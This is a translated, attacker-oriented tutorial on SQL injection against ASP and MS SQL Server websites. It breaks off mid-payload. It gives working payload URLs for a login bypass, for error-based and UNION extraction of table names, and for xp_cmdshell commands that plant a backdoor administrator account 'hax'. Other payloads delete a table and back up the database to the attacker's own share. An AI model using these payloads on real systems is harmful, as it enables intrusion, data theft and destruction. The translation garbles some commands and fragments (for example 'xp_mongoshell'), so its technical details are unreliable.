SQL Injection basics and skills

Preface:
This article is a work I wrote a long time ago. After writing it, I learned that isno also wrote an article. After reading the isno article, I found many mistakes in my article. Later I made some modifications to this article, hoping to help readers.
[What is SQL Injection]
SQL Injection is called an SQL command implant attack, which is mainly caused by the Input Validation problem. It describes an action to attack an application by writing Special SQL code.
[Principles of SQL Injection]
Generally, the SQL syntax for websites that enter the account and password is
Select * from member where UID = '"& request (" ID ") &" 'nand Passwd =' "& request (" Pwd ")&"'
If a normal user enters the pl account, the password is 1234.
Then the program will execute select * from member where UID = 'pl 'And Passwd = '123'
The input account, password, and other information will replace the variables in ASP (or PHP, JSP) and be enclosed by two single quotes. If the attacker knows that an Admin account already exists in the system, enter admin' -- to enter the database without a password. The corresponding statement is
Select * from member where UID = 'admin' -- 'nand Passwd =''
(Note: any description after the "-" symbol will be treated as an annotation, that is, the And clause in the preceding example will be considered as a description in SQL)
[Vulnerability Detection]
For most SQL servers, we do not know the specific code of the other program, and it is impossible to discover the SQL injection vulnerability by any scanner, so we need to manually detect it. Since we use single quotation marks, semicolons, commas, colons, and "-" to execute SQL statements, we can add the above match to the URL or add it to the text box in the form. For example:
Http: // jsw/new. asp? Id = 1'
Http: // jsw/new. asp? Id = 1;
Check whether the SQL injection vulnerability exists through the information returned by the page. This method is simply determined by character filtering. The returned information may vary depending on the IIS configuration. Sometimes show
Microsoft ole db Provider for ODBC Drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'login _ id' to a column of data type int.
/Index. asp, line 5
It may also be "http 500-internal server error", or the normal information is displayed. The judgment is based on experience, because many servers have not encountered any errors.

[Execute system commands]
The SQL injection attack method was first originated from the 'or '1' = '1 Vulnerability (which we call a vulnerability for the time being). I think you should know the principle of this vulnerability, exec sp_addlogin hax (add a hax user to the database), but this method is very restrictive. First, the SQL Server account used by ASP is an administrator, second, the request submission variables are at the end of the entire SQL statement, because some programmers use
SELECT * FROM news WHERE id =... AND topic =... AND .....
If this method is used to request the database
News. asp? Id = 2; exec sp_addlogin hax
Change
SELECT * FROM news WHERE id = 2; exec sp_addlogin hax AND topic = AND
After executing the storage process of sp_addlogin, the entire SQL statement has an AND judgment, AND the syntax is incorrect. Your sp_addlogin cannot run normally. Therefore, try the following method:
News. asp? Id = 2; exec sp_addlogin hax ;--
The -- symbol next to it changes the judgment statement after sp_addlogin into a comment, so there will be no syntax errors. sp_addlogin can be executed normally!
How can we determine whether our command has been successfully executed? We first installed a _ blank "> firewall, opened the ICMP, 139TCP, and 445TCP warning prompt, and then submitted
News. asp? Id = 2; exec master. dbo. xp_mongoshell 'Ping your ip'
If _ blank "> the firewall prompts someone to ping you, it is certain that ASP of the other party uses the SQL administrator permission, and also determines the exact location of the SQL Server of the other party, because many larger websites consider performance, the web Service is separated from the database. when the other side fails to see the source code when the patch is installed, I think only this method can quickly locate the target SQL Server.
Let's use them together.
News. asp? Id = 2; exec master. dbo. sp_addlogin hax ;--
News. asp? Id = 2; exec master. dbo. sp_password null, hax, hax ;--
News. asp? Id = 2; exec master. dbo. sp_addsrvrolemember sysadmin hax ;--
News. asp? Id = 2; exec master. dbo. xp_cmdshell 'net user hax/workstations: */times: all/passwordchg: yes/passwordreq: yes
/Active: yes/add ';--
News. asp? Id = 2; exec master. dbo. xp_mongoshell 'net localgroup administrators hax/add ';--
In this way, you have left the hax Administrator Account in both the database and system.
Of course, you can try to add a 'symbol after id = 2, mainly to see how the ASP of the other side is written.
Use master .. xp_mongoshell, extension, we can execute any command on the target host, similar to xp_startmail, xp_sendmail, sp_makewebtask, specific usage and master .. xp_mongoshell is similar. I will not talk about it here. Note that the prerequisite for this attack method is that ASP uses the Administrator account, so you should stop trying the virtual space and the vulnerability will not exist.
In the future, we will discuss how to attack ASP if the other party does not use the SQL administrator account.
[Attacks on databases]
The SQL account used by ASP is usually the owner of a database even if it is not the Administrator. At least the database has high management permissions. You can try it.
Http: // jsw/something. asp? Newid = 117; select 123 ;--
A syntax error is reported. select 123 is incorrect. Obviously, ASP ends with the 'sign after the newid variable.
Then try http: // jsw/something.. asp? Newid = 117 '; delete news ;--
Haha, I think the information in the database will be deleted as long as the table name is guessed right.
Another way is to submit
News. asp? Id = 2; declare @ a; set @ a = db_name (); backup database @ a to disk = 'your IP address, your shared directory bak. dat ', name = 'test ';--
Haha, your _ blank "> The firewall should have issued a warning. Someone connected to your port 445 or 139 (win9 port, so that the ip address of the other side's SQL can be exposed, in fact, it would be a bit exaggerated to use the backuo database to your hard disk. If the other database is very large, you can use a dial-up to access the Internet again.

[Extract arbitrary information from the database]
This is an important part of this article. Generally, SQL statements used to query data use the following format:
Someting. asp:
V_cat = request ("category ")
Sqlstr = "SELECT * FROM product WHERE PCategory = '" & v_cat &"'"
Set rsw.conn.exe cute (sqlstr)
Then we will submit to the ASP file containing the above Code
Http: // jsw/index. asp? Category = food 'or 1 = 1 --'
Switch to the program and change
SELECT * FROM product WHERE PCategory = 'food' or 1 = 1 --'
That is to say, we can submit some illegal values to this ASP script to execute the SQL statement we want.
The following describes how to use SQL injection in an attack process.
When using SQL injection attacks, we first need to obtain the structure of the target database and submit
Http: // jsw/index. asp? Id = 10 union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --
INFORMATION_SCHEMA.TABLES contains all the table names in the database. The SQL statement we submit is
Select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
It is mainly used to obtain the first table name in the database. When ms SQL Server tries to execute this statement, the following information is returned:

Microsoft ole db Provider for ODBC Drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'syssegances' to a column of data type int.
/Index. asp, line 5

The ODBC error information exactly contains what we want. Now we can get the first table name in the database: "syssegments", which is automatically generated after the database is created. Next we will continue to submit:
Http: // jsw/index. asp? Id = 10 union select top 1 TABLE_NAME FROM INFORMATION_ SC